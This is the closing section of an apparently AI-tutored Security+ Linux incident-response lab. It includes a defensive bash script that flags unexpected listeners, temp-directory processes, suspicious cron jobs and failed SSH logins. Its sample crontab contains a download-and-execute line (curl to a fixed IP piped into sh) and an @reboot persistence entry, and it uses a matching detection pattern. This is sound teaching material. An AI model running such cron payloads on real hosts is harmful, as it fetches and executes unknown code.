What You Learned in This Lab
Over this exercise you practiced the real incident response workflow used by SOC analysts:
Network Investigation
ss
lsof
tshark
Process Investigation
ps
top
kill
Persistence Detection
cron
system services
startup files
Log Analysis
journalctl
login history
command history
These skills map directly to Security+ 701 Security Operations (Domain 4).
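As an added example (not part of the original lab), here is a small bash triage script that ties the four areas above together: it parses ss -tlnp output for listeners outside an allowlist, finds processes executing out of /tmp or /dev/shm in ps output, flags cron entries with download-and-execute or temp-directory patterns, and counts failed SSH logins per source address from sshd log lines. The sample inputs, the port allowlist and the cron heuristics are constructed assumptions to adapt to your own baseline; without arguments it runs the parsers over the samples, and with --live it applies the same functions to the local host.

```bash
#!/usr/bin/env bash
# Added triage helpers for the four areas in this lab (network, process, persistence, logs).
# Not part of the original lab. Every sample below is constructed; the port allowlist and the
# cron heuristics are assumptions to adapt to your own baseline.

ALLOWED_PORTS="22 631"   # assumed baseline of expected listening ports

# --- Network: listeners not in the allowlist, parsed from `ss -tlnp` output ---
unexpected_listeners() {
  # stdin: ss -tlnp output; $1: space-separated allowed ports; stdout: "<port> <process> <pid>"
  awk -v allow=" $1 " '
    $1 == "LISTEN" {
      n = split($4, a, ":"); port = a[n]
      if (index(allow, " " port " ") == 0) {
        proc = "?"; pid = "?"
        if (match($6, /"[^"]+"/)) proc = substr($6, RSTART + 1, RLENGTH - 2)
        if (match($6, /pid=[0-9]+/)) pid = substr($6, RSTART + 4, RLENGTH - 4)
        print port, proc, pid
      }
    }'
}

# --- Process: commands executing out of world-writable temp directories ---
procs_from_temp_dirs() {
  # stdin: `ps -eo pid,user,args` output; stdout: "<pid> <user> <executable>" for /tmp or /dev/shm paths
  awk 'NR > 1 && $3 ~ /^\/(tmp|dev\/shm)\// { print $1, $2, $3 }'
}

# --- Persistence: cron entries with download-and-execute or temp-directory payloads ---
flag_cron_lines() {
  # stdin: crontab-format lines; stdout: matching entries (comments skipped)
  grep -v '^[[:space:]]*#' | grep -E 'curl|wget|[|] *(ba)?sh|/tmp/|/dev/shm/|base64 +(-d|--decode)' || true
}

# --- Logs: failed SSH logins per source address from sshd log lines ---
failed_logins_by_ip() {
  # stdin: sshd log lines; stdout: "<count> <ip>" sorted by count, highest first
  grep -E 'Failed password' | grep -oE 'from ([0-9]{1,3}\.){3}[0-9]{1,3}' \
    | awk '{ print $2 }' | sort | uniq -c | sort -rn | awk '{ print $1, $2 }' || true
}

# Constructed samples standing in for live tool output.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      4096   0.0.0.0:4444        0.0.0.0:*         users:(("agent",pid=2231,fd=3))
LISTEN 0      128    127.0.0.1:631       0.0.0.0:*         users:(("cupsd",pid=640,fd=7))'
SAMPLE_PS='  PID USER     COMMAND
    1 root     /sbin/init
  812 root     /usr/sbin/sshd -D
 2231 www-data /tmp/.cache/agent -p 4444
 2400 alice    /usr/bin/bash'
SAMPLE_CRON='# constructed sample crontab
0 3 * * * /usr/bin/apt-get update
*/5 * * * * curl -s http://203.0.113.10/x.sh | sh
@reboot /dev/shm/.cache/run
15 * * * * /usr/local/bin/backup.sh'
SAMPLE_AUTH='Nov 12 10:01:02 host sshd[1001]: Failed password for invalid user admin from 203.0.113.5 port 51122 ssh2
Nov 12 10:01:04 host sshd[1002]: Failed password for root from 203.0.113.5 port 51130 ssh2
Nov 12 10:02:10 host sshd[1003]: Accepted publickey for alice from 198.51.100.7 port 40022 ssh2
Nov 12 10:03:00 host sshd[1004]: Failed password for invalid user test from 198.51.100.9 port 40100 ssh2'

live_sweep() {
  # Apply the same checks to this host; each tool is optional so the sweep degrades gracefully.
  if command -v ss >/dev/null 2>&1; then
    echo "== listeners outside the allowlist =="
    ss -tlnp 2>/dev/null | unexpected_listeners "$ALLOWED_PORTS"
  fi
  echo "== processes running from temp directories =="
  ps -eo pid,user,args | procs_from_temp_dirs
  echo "== suspicious cron entries =="
  { cat /etc/crontab /etc/cron.d/* 2>/dev/null; crontab -l 2>/dev/null; } | flag_cron_lines
  if command -v journalctl >/dev/null 2>&1; then
    echo "== failed SSH logins by source =="
    journalctl -t sshd --no-pager 2>/dev/null | failed_logins_by_ip
  fi
}

if [ "${1:-}" = "--live" ]; then
  live_sweep
else
  # Default: run the parsers over the constructed samples.
  printf '%s\n' "$SAMPLE_SS"   | unexpected_listeners "$ALLOWED_PORTS"
  printf '%s\n' "$SAMPLE_PS"   | procs_from_temp_dirs
  printf '%s\n' "$SAMPLE_CRON" | flag_cron_lines
  printf '%s\n' "$SAMPLE_AUTH" | failed_logins_by_ip
fi
```

Run it as-is to see what each parser flags in the samples, or with --live on a lab host. Note that ss only shows the owning process for sockets you have permission to inspect, so run the live sweep as root (or with sudo) to get the process column for every listener, and treat the allowlist as a host-specific baseline you build from a known-good state rather than a fixed list.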
Where We Are in Your Study Plan
You have now practiced most of the Security+ 701 monitoring and investigation concepts that Professor Messer explains in sections 4.1–4.9.
You learned them hands-on using Linux, which is the best way to retain them.
Before We Continue Tomorrow
Tomorrow we can move into the next powerful topics:
1️⃣ Detecting port scans and attackers on your network
2️⃣ Building a small monitoring lab using packet capture
3️⃣ Detecting data exfiltration
4️⃣ Using Python to automate threat detection
These will strengthen both your Linux and Python skills, which you mentioned earlier you want to build.